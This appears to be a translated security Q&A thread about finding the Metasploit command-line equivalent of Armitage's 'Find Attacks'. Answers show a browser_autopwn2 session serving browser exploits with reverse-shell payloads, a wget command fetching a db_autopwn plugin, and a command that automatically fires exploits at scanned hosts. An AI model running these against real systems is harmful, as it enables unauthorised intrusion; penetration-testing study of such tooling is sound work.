armitage find attack tool cli equivalente command

3

He estado usando metasploit a través del cli y un poco a través de armitage. La herramienta en aritmage para encontrar ataques que te ofrezcan ataques con más probabilidades de funcionar es muy útil, así que me preguntaba cuál es el comando cli que se ejecuta si hay uno.

Si no existe, ¿cuál es la mejor manera de filtrar a través de los módulos y encontrar cuáles son los mejores ataques posibles? Obviamente, uso la búsqueda y el filtro según el servicio, el sistema operativo, etc., pero no tengo una manera de saber qué módulo sería el más adecuado en comparación con otros.

    
pregunta dmnte 11.04.2016 - 16:18
fuente

3 respuestas

2

En Metasploit solía haber una opción de autopwn que haría lo que está buscando pero solo se dirige a los navegadores. Sin embargo, al igual que el nombre en Armitage implica, selecciona un gran conjunto de proezas, dispara al objetivo y espera lo mejor. Sin embargo, la explotación, si no se hace correctamente, puede hacer más daño que bien. Por ejemplo, un exploit SMB que tiene un destino incorrecto seleccionado puede bloquear el servicio SMB que requiere un reinicio manual de la máquina para solucionarlo. Esto significa que no solo la persona que ataca la máquina no obtendrá una sesión, sino que también puede ser detectada fácilmente. En base a estas preocupaciones, la funcionalidad de autopwn ha quedado en desuso. Metasploit ahora tiene el módulo AutoPwn2 que se dirige solo a las vulnerabilidades basadas en el navegador, pero de una manera mucho más inteligente. Esto es mejor en el sentido de que las explotaciones solo se activan si el objetivo se toma las huellas digitales correctamente y luego los módulos se activan según sus rangos, lo que significa que primero se intentan explotaciones más confiables. De esta manera, si está apuntando a un exploit flash, no necesita preocuparse por la arquitectura y los detalles del sistema operativo de los usuarios conectados y el módulo se hará cargo de ello.

msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn2) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Using URL: http://0.0.0.0:8080/

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://x.x.x.x:8080/
[*] Server started.
    
respondido por el void_in 14.04.2016 - 07:36
fuente
2

Mirando el código Armitage para Find Attacks parece que implementa su propia versión de una opción antigua en Metasploit db_autopwn que había quedado obsoleta en 2011.

Sin embargo, he encontrado un complemento actualizado "recientemente" (agosto de 2017) para esta opción que se puede encontrar aquí: metasploit-db_autopwn

Para instalar, vaya al directorio del complemento Metasploits (en Kali: /usr/share/metasploit-framework/plugins/ )

Luego descarga el plugin:

wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

Inicia Metasploit y luego carga el complemento:

msf > load db_autopwn

Puedes verificar las opciones con db_autopwn -h

Escanee y cargue hosts en su base de datos como usualmente usaría db_nmap .

Si desea escanear & ejecutar exploits que tienen el rango de "excelente" abriendo sesiones automáticamente, puede ejecutar:

msf > db_autopwn -p -R great -e -q

    
respondido por el Sabe Barker 06.12.2017 - 08:13
fuente
0

Msfconsole tiene un comando de búsqueda. Si intenta primero con search -h tendrá una sintaxis válida, con el módulo de búsqueda tendrá opciones para encontrar por cve, título, nombre de la plataforma, etc. Si necesita filtrar, use la tecla de tabulación de la misma manera que usa en la consola de linux. Mostrará las opciones de autocompletar.

Este camino es mucho más manual que la función de búsqueda de armitage, pero si dedicas el tiempo a buscar esos ataques por ti mismo, obtendrás habilidades reales, más allá de presionar el botón de encontrar ataques en armitage. Aquí está el metaspoit db tutorial , en esta guía encontrará cómo iniciar la db manualmente. , cómo importar escaneos desde otras herramientas, etc.

De hecho, la fase de explotación dependerá directamente de la fase de recopilación de información, así que no limite la alegría de la explotación a la herramienta automática para hacer el trabajo por usted. Son muchos los exploits que no están incluidos en metasploit / armitage y deberás encontrarlos "por ahí", siempre es una buena idea buscar en lugares famosos como base de datos de exploits siempre lea un exploit y entienda lo que hace, y cómo antes de usarlo, puede dañarse a usted mismo oa otros

Con todo lo dicho, buena caza.

enlace

    
respondido por el Sarastro 13.04.2016 - 14:41
fuente

Lea otras preguntas en las etiquetas